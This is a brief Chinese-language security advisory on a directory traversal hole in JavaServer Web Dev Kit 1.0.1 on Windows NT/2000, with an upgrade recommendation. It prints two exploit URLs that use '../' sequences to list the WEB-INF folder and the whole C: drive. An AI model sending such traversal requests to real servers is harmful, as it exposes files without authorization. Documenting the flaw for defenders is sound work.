JavaServer Web Dev Kit(JSWDK) for win2000 目录遍历漏洞

　　 
　　涉及程序：
JavaServer Web Dev Kit(JSWDK)
描述：
JavaServer Web Dev Kit(JSWDK) for win2000 目录遍历漏洞
详细：
发现装了 JavaServer Web Dev Kit(JSWDK)1.0.1 的 WINDOWS NT/2000 系统存在漏洞，

攻击者通过构造特殊的 URL 请求能访问未授权文件。
exploits:
http://localhost:8080/examples//WEB-INF/
会列出 /WEB-INF/ 目录 .
http://localhost:8080/../examples//WEB-INF/../../../../../
如果 JSWDK 被装在 c: ，此请求将会列出 c: 下所有目录和文件
受影响系统：
JavaServer Web Dev Kit(JSWDK)1.0.1 for win2000
解决方案：
CNNS 建议您升级 JSWDK 版本
建议您升级到tomcat.

原文转自：http://www.ltesting.net